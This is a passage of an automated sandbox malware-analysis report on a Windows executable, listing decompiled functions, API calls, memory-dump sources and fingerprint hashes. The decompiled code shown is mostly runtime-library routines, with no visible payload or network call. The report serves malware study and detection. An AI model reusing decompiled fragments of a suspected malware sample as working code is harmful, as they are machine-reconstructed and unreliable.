                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientEnabledMessageScreenWindow
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 2232508433-2766056989
                                                                                                                              • Opcode ID: daab2f22edfcd687845fde42b96ae15f507a77adda4e9d46e54359147672aa18
                                                                                                                              • Instruction ID: 27d599fb704563115168847a3cd02e7f94631c9e4b416c305a17532f9383e764
                                                                                                                              • Opcode Fuzzy Hash: daab2f22edfcd687845fde42b96ae15f507a77adda4e9d46e54359147672aa18
                                                                                                                              • Instruction Fuzzy Hash: D151C471640305ABC220AF649CC1F6B77D4AFC4710F540A3EF645BB2D1DBB9E8058B99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040FA20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: UpdateWindow_memset
                                                                                                                              • String ID: D$C$Get Item Failed
                                                                                                                              • API String ID: 3202691948-910777255
                                                                                                                              • Opcode ID: 56ef10dd5aecdc9405e93def9fd0f7caa62a26c98315826aeee2eab3eddbec79
                                                                                                                              • Instruction ID: be145949c7fe848192c1da6488bb0e76542124ddb00f37cba37d2de72a038830
                                                                                                                              • Opcode Fuzzy Hash: 56ef10dd5aecdc9405e93def9fd0f7caa62a26c98315826aeee2eab3eddbec79
                                                                                                                              • Instruction Fuzzy Hash: 47513CB0509340AFD360DF25C945BABBBE8BB89704F00492EF688D6690D7B999448B56
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0097209D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                              • API String ID: 0-2589094694
                                                                                                                              • Opcode ID: 9c3caf4c95daf263200fa2e85ca73447bc26010009f940bc389279bed0d2c955
                                                                                                                              • Instruction ID: 58f1d92b84096ca32cc6c8b471b9959b21ea1b92afb2a19986bd4e465289e66a
                                                                                                                              • Opcode Fuzzy Hash: 9c3caf4c95daf263200fa2e85ca73447bc26010009f940bc389279bed0d2c955
                                                                                                                              • Instruction Fuzzy Hash: C641E572A24658AFCB21DF99DC81DAEBBFCFB85310B918066F50897311D7718E40D750
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00973E1E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00973D24,?,?,00000000,00000000,00000000,?), ref: 00973E43
                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 00973F29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CatchEncodePointer
                                                                                                                              • String ID: MOC$RCC
                                                                                                                              • API String ID: 1435073870-2084237596
                                                                                                                              • Opcode ID: 217850bd677fddbb49cb6bfbd32e430aa9655bfc0647dde43ebf9f0c17f36632
                                                                                                                              • Instruction ID: ed0c70f589aed387bf06bee3ec7af6bd08da06be099fcbe41f1cfa9289e2d068
                                                                                                                              • Opcode Fuzzy Hash: 217850bd677fddbb49cb6bfbd32e430aa9655bfc0647dde43ebf9f0c17f36632
                                                                                                                              • Instruction Fuzzy Hash: 06412672D00209EFDF15DF98DD81AEEBBB9BF48304F15C199F908A6261D3359A50EB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00407410 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000004,00000003,00000000,00000000,00000000,?,00000000,00402645,00000000,-00000002), ref: 0040743A
                                                                                                                              • CoCreateInstance.OLE32(00433D04,00000000,00000001,00433C34,?,?,00000000,00402645,00000000,-00000002), ref: 00407488
                                                                                                                              Strings
                                                                                                                              • CoCreateInstance failed - %x, xrefs: 00407495
                                                                                                                              • CoIntializeSecurity failed - %x, xrefs: 00407447
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInitializeInstanceSecurity
                                                                                                                              • String ID: CoCreateInstance failed - %x$CoIntializeSecurity failed - %x
                                                                                                                              • API String ID: 948957880-2838648291
                                                                                                                              • Opcode ID: 69c02cb9e73eec1c5454f859f32ea4df33a44efb32ec9a3649e008ee257b2e39
                                                                                                                              • Instruction ID: d3180098ba5794a51b98df5c4ea52b684e2a771efd4a54566d9e7f2b120db880
                                                                                                                              • Opcode Fuzzy Hash: 69c02cb9e73eec1c5454f859f32ea4df33a44efb32ec9a3649e008ee257b2e39
                                                                                                                              • Instruction Fuzzy Hash: B811C2757847003BE230AA69EC06F573A958BC4B15F34046DF654BB2C0D9F8E8418269
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00414830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E00414830(intOrPtr __ecx, void* __edx) {
				char* _v0;
				char _v8;
				char _v12;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				void* __ebx;
				void* __esi;
				signed int _t28;
				void* _t48;
				void* _t49;
				intOrPtr _t51;
				void* _t53;
				void* _t54;

				_t48 = __edx;
				_push(0xffffffff);
				_push(E00430E6C);
				_push( *[fs:0x0]);
				_t28 =  *0x43a6a8; // 0x2a5cd135
				_push(_t28 ^ _t54 - 0x00000048);
				 *[fs:0x0] =  &_v12;
				_t51 = __ecx;
				_v84 = __ecx;
				E0041A113(__ecx, 0);
				 *((intOrPtr*)(__ecx + 0x1c)) = 0xf;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				_v8 = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0xf;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				 *((char*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x54)) = 0xf;
				 *((intOrPtr*)(__ecx + 0x50)) = 0;
				 *((char*)(__ecx + 0x40)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0xf;
				 *((intOrPtr*)(__ecx + 0x6c)) = 0;
				 *((char*)(__ecx + 0x5c)) = 0;
				_t43 = _v0;
				_t58 = _t43;
				_v8 = 4;
				if(_t43 == 0) {
					_v56 = 0xf;
					_v60 = 0;
					_v76 = 0;
					E00401A00( &_v80, "bad locale name", 0xf);
					_v12 = 5;
					E00414730(_t48, _t58,  &_v88);
					_t43 =  &_v64;
					E0041ADC6( &_v64, 0x4383ec);
				}
				E0041A407(0, _t49, _t51, _t53, _t58, _t51, _t43);
				 *[fs:0x0] = _v12;
				return _t51;
			}





















                                                                                                                              0x00414830
                                                                                                                              0x00414830
                                                                                                                              0x00414832
                                                                                                                              0x0041483d
                                                                                                                              0x00414843
                                                                                                                              0x0041484a
                                                                                                                              0x0041484f
                                                                                                                              0x00414855
                                                                                                                              0x00414857
                                                                                                                              0x0041485e
                                                                                                                              0x00414868
                                                                                                                              0x0041486b
                                                                                                                              0x0041486e
                                                                                                                              0x00414872
                                                                                                                              0x00414875
                                                                                                                              0x00414878
                                                                                                                              0x0041487b
                                                                                                                              0x0041487e
                                                                                                                              0x00414881
                                                                                                                              0x00414884
                                                                                                                              0x00414887
                                                                                                                              0x0041488a
                                                                                                                              0x0041488d
                                                                                                                              0x00414890
                                                                                                                              0x00414894
                                                                                                                              0x00414896
                                                                                                                              0x0041489b
                                                                                                                              0x004148a7
                                                                                                                              0x004148ab
                                                                                                                              0x004148af
                                                                                                                              0x004148b3
                                                                                                                              0x004148c1
                                                                                                                              0x004148c6
                                                                                                                              0x004148d0
                                                                                                                              0x004148d5
                                                                                                                              0x004148d5
                                                                                                                              0x004148dc
                                                                                                                              0x004148ea
                                                                                                                              0x004148f7

                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0041485E
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 004148D5
                                                                                                                                • Part of subcall function 0041ADC6: RaiseException.KERNEL32(?,?,0041ADC5,?,?,?,?,?,0041ADC5,?,00436E98,0043C118), ref: 0041AE06
                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004148DC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: std::_$ExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow
                                                                                                                              • String ID: bad locale name
                                                                                                                              • API String ID: 1915927752-1405518554
                                                                                                                              • Opcode ID: ab61764e90e0b860dbb0251245c2186ce6317cc822a47adc0feb01118d00b0b8
                                                                                                                              • Instruction ID: 7b3a5c70c57d06de3e0b158a3c9a5884f33d6e95fabd8438633d0a97e9038141
                                                                                                                              • Opcode Fuzzy Hash: ab61764e90e0b860dbb0251245c2186ce6317cc822a47adc0feb01118d00b0b8
                                                                                                                              • Instruction Fuzzy Hash: 3E214FB15097809FC321DF2AC981A5BFBE4BB58710F40492EF09683B41D778E408CF5A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 37%
                                                                                                                              			E00401240(signed int _a4) {
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* __esi;
				signed int _t13;
				void* _t23;
				signed int _t24;
				intOrPtr* _t26;
				void* _t30;
				void* _t31;
				intOrPtr* _t32;

				_t24 = _a4;
				if(_t24 > 0) {
					__eflags = (_t13 | 0xffffffff) / _t24 - 2;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E0041A993( &_v12,  &_a4);
						_t26 =  &_v16;
						_v16 = 0x432324;
						E0041ADC6(_t26, 0x436e98);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t31);
						_t32 = _t26;
						E0041A9F9(_t26, _v20);
						 *_t32 = 0x432324;
						return _t32;
					}
				} else {
					_t24 = 0;
					L2:
					_push(_t24 + _t24);
					return E0041AD5C(_t23, _t24 + _t24, _t30, _t31, 0);
				}
			}














                                                                                                                              0x00401240
                                                                                                                              0x00401249
                                                                                                                              0x00401264
                                                                                                                              0x00401267
                                                                                                                              0x00000000
                                                                                                                              0x00401269
                                                                                                                              0x00401272
                                                                                                                              0x0040127a
                                                                                                                              0x00401284
                                                                                                                              0x00401289
                                                                                                                              0x00401291
                                                                                                                              0x00401296
                                                                                                                              0x00401297
                                                                                                                              0x00401298
                                                                                                                              0x00401299
                                                                                                                              0x0040129a
                                                                                                                              0x0040129b
                                                                                                                              0x0040129c
                                                                                                                              0x0040129d
                                                                                                                              0x0040129e
                                                                                                                              0x0040129f
                                                                                                                              0x004012a4
                                                                                                                              0x004012a6
                                                                                                                              0x004012a8
                                                                                                                              0x004012ad
                                                                                                                              0x004012b6
                                                                                                                              0x004012b6
                                                                                                                              0x0040124b
                                                                                                                              0x0040124b
                                                                                                                              0x0040124d
                                                                                                                              0x00401250
                                                                                                                              0x0040125c
                                                                                                                              0x0040125c

                                                                                                                              APIs
                                                                                                                              • std::exception::exception.LIBCMT ref: 0040127A
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00401291
                                                                                                                              • std::exception::exception.LIBCMT ref: 004012A8
                                                                                                                                • Part of subcall function 0041AD5C: _malloc.LIBCMT ref: 0041AD74
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                              • String ID: $#C
                                                                                                                              • API String ID: 2388904642-2440646757
                                                                                                                              • Opcode ID: 2ac7be34844323d687bfaa4a2f6f802a33a2f218f25ad996db58256373fb6802
                                                                                                                              • Instruction ID: 992756b931b055a56b1ba24e62dfd919094e63453b5dce8091feddee72067813
                                                                                                                              • Opcode Fuzzy Hash: 2ac7be34844323d687bfaa4a2f6f802a33a2f218f25ad996db58256373fb6802
                                                                                                                              • Instruction Fuzzy Hash: 31F0F6B15043006BC318EF64E541A9F77E1AF94700F108E2FF559C2180D7B8D958C65B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041F3B6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 28%
                                                                                                                              			E0041F3B6(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0041F325(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E0041B069(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0041ED96(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0041F00A(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E0041B032(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                                                                                                              0x0041f3b6
                                                                                                                              0x0041f3b6
                                                                                                                              0x0041f3b6
                                                                                                                              0x0041f3b6
                                                                                                                              0x0041f3b6
                                                                                                                              0x0041f3b9
                                                                                                                              0x0041f3bd
                                                                                                                              0x0041f3bf
                                                                                                                              0x0041f3c2
                                                                                                                              0x0041f3c3
                                                                                                                              0x0041f3c4
                                                                                                                              0x0041f3c7
                                                                                                                              0x0041f3cc
                                                                                                                              0x0041f3cc
                                                                                                                              0x0041f3cf
                                                                                                                              0x0041f3d3
                                                                                                                              0x0041f3d6
                                                                                                                              0x0041f3db
                                                                                                                              0x0041f3d8
                                                                                                                              0x0041f3d8
                                                                                                                              0x0041f3d8
                                                                                                                              0x0041f3de
                                                                                                                              0x0041f3e3
                                                                                                                              0x0041f3e5
                                                                                                                              0x0041f3e8
                                                                                                                              0x0041f3eb
                                                                                                                              0x0041f3ec
                                                                                                                              0x0041f3f4
                                                                                                                              0x0041f3f9
                                                                                                                              0x0041f3fd
                                                                                                                              0x0041f400
                                                                                                                              0x0041f403
                                                                                                                              0x0041f409
                                                                                                                              0x0041f40a
                                                                                                                              0x0041f40d
                                                                                                                              0x0041f417
                                                                                                                              0x0041f41b
                                                                                                                              0x00000000
                                                                                                                              0x0041f41b
                                                                                                                              0x0041f421

                                                                                                                              APIs
                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 0041F3C7
                                                                                                                                • Part of subcall function 0041F325: ___BuildCatchObjectHelper.LIBCMT ref: 0041F35B
                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0041F3DE
                                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 0041F3EC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                              • String ID: csm
                                                                                                                              • API String ID: 2163707966-1018135373
                                                                                                                              • Opcode ID: 44a92af69c4b617191d3b848a903e37858059918815f8ecf043a75bd79ad1c64
                                                                                                                              • Instruction ID: cf91fa8fe02f75987dfaebc2c5eb3e641c6575c03d81e0872f6e71b6f528c75a
                                                                                                                              • Opcode Fuzzy Hash: 44a92af69c4b617191d3b848a903e37858059918815f8ecf043a75bd79ad1c64
                                                                                                                              • Instruction Fuzzy Hash: EF01F67100010ABBDF126F52DD45EEB7F6AEF08388F008026FD2854161D77A99F6DBA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041AD5C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 84%
                                                                                                                              			E0041AD5C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v16;
				char _v20;
				long _v24;
				signed int _v32;
				void* _v36;
				long _v40;
				void _v60;
				void* _t21;
				signed int _t22;
				signed int _t27;
				DWORD* _t28;
				void* _t31;
				signed int _t35;
				void* _t39;
				void* _t40;
				void* _t45;

				_t45 = __esi;
				_t40 = __edi;
				_t39 = __edx;
				_t31 = __ebx;
				while(1) {
					_t21 = E0041C9FB(_t31, _t39, _t40, _t45, _a4);
					if(_t21 != 0) {
						break;
					}
					_t22 = E00420513(_a4);
					__eflags = _t22;
					if(_t22 == 0) {
						__eflags =  *0x43c124 & 0x00000001;
						if(( *0x43c124 & 0x00000001) == 0) {
							 *0x43c124 =  *0x43c124 | 0x00000001;
							__eflags =  *0x43c124;
							E0041AD43(0x43c118);
							E0041B6E1( *0x43c124, 0x431644);
						}
						E0041A9F9( &_v16, 0x43c118);
						_push(0x436e98);
						_push( &_v16);
						_v16 = 0x432324;
						L7();
						asm("int3");
						_push(0x43c118);
						_push(_t40);
						_t35 = 8;
						_v36 = memcpy( &_v60, 0x433e38, _t35 << 2);
						_t27 = _v16;
						__eflags = _t27;
						_v32 = _t27;
						if(_t27 != 0) {
							__eflags =  *_t27 & 0x00000008;
							if(( *_t27 & 0x00000008) != 0) {
								_v20 = 0x1994000;
							}
						}
						_t28 =  &_v20;
						RaiseException(_v40, _v36, _v24, _t28);
						return _t28;
					} else {
						continue;
					}
					L11:
				}
				return _t21;
				goto L11;
			}



















                                                                                                                              0x0041ad5c
                                                                                                                              0x0041ad5c
                                                                                                                              0x0041ad5c
                                                                                                                              0x0041ad5c
                                                                                                                              0x0041ad71
                                                                                                                              0x0041ad74
                                                                                                                              0x0041ad7c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041ad67
                                                                                                                              0x0041ad6c
                                                                                                                              0x0041ad6f
                                                                                                                              0x0041ad80
                                                                                                                              0x0041ad8c
                                                                                                                              0x0041ad8e
                                                                                                                              0x0041ad8e
                                                                                                                              0x0041ad97
                                                                                                                              0x0041ada1
                                                                                                                              0x0041ada6
                                                                                                                              0x0041adab
                                                                                                                              0x0041adb0
                                                                                                                              0x0041adb8
                                                                                                                              0x0041adb9
                                                                                                                              0x0041adc0
                                                                                                                              0x0041adc5
                                                                                                                              0x0041adcf
                                                                                                                              0x0041add0
                                                                                                                              0x0041add3
                                                                                                                              0x0041adde
                                                                                                                              0x0041ade1
                                                                                                                              0x0041ade4
                                                                                                                              0x0041ade7
                                                                                                                              0x0041adeb
                                                                                                                              0x0041aded
                                                                                                                              0x0041adf0
                                                                                                                              0x0041adf2
                                                                                                                              0x0041adf2
                                                                                                                              0x0041adf0
                                                                                                                              0x0041adf9
                                                                                                                              0x0041ae06
                                                                                                                              0x0041ae0d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041ad6f
                                                                                                                              0x0041ad7f
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 0041AD74
                                                                                                                                • Part of subcall function 0041C9FB: __FF_MSGBANNER.LIBCMT ref: 0041CA1E
                                                                                                                                • Part of subcall function 0041C9FB: RtlAllocateHeap.NTDLL(00000000,0041AD6A,?,?,?,?,0041AD79,004011F3,?,004011F3,?), ref: 0041CA73
                                                                                                                              • std::exception::exception.LIBCMT ref: 0041ADAB
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0041ADC0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::exception::exception
                                                                                                                              • String ID: $#C
                                                                                                                              • API String ID: 1264268182-2440646757
                                                                                                                              • Opcode ID: ca600b3315455b86f0174615c69cb714b9e01ae807c4aff0bc43e9a4fb84a061
                                                                                                                              • Instruction ID: 12a9ea82c8dabf97a9e8b9c6bff20dbea7768ce44bd3667a4604f107e4c9e26c
                                                                                                                              • Opcode Fuzzy Hash: ca600b3315455b86f0174615c69cb714b9e01ae807c4aff0bc43e9a4fb84a061
                                                                                                                              • Instruction Fuzzy Hash: 99F0B4355026046ACF04ABA2FC435CD3B968E0430DF10802FE801A1453DB7C5AE55A4E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009727BB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID: `?[$`?[
                                                                                                                              • API String ID: 269201875-1876265264
                                                                                                                              • Opcode ID: 8139a4cf1649768db8cddaa3f053bbd2a6579be5d25e22843ce09eca38a27e2a
                                                                                                                              • Instruction ID: f2f3a6f757c998e79d516253c707aecb34ae0d2d5afd2777d0cc2b1136b02121
                                                                                                                              • Opcode Fuzzy Hash: 8139a4cf1649768db8cddaa3f053bbd2a6579be5d25e22843ce09eca38a27e2a
                                                                                                                              • Instruction Fuzzy Hash: A1E02B3762DA1042D225173DAC443EE0585ABC5331F23C336F82C8A2D0DBBB8C46A2D3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00977C66 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00977D02,00000000,?,0098523C,?,?,?,00977C39,00000004,InitializeCriticalSectionEx,0097E780,0097E788), ref: 00977C73
                                                                                                                              • GetLastError.KERNEL32(?,00977D02,00000000,?,0098523C,?,?,?,00977C39,00000004,InitializeCriticalSectionEx,0097E780,0097E788,00000000,?,0097404C), ref: 00977C7D
                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00977CA5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LibraryLoad$ErrorLast
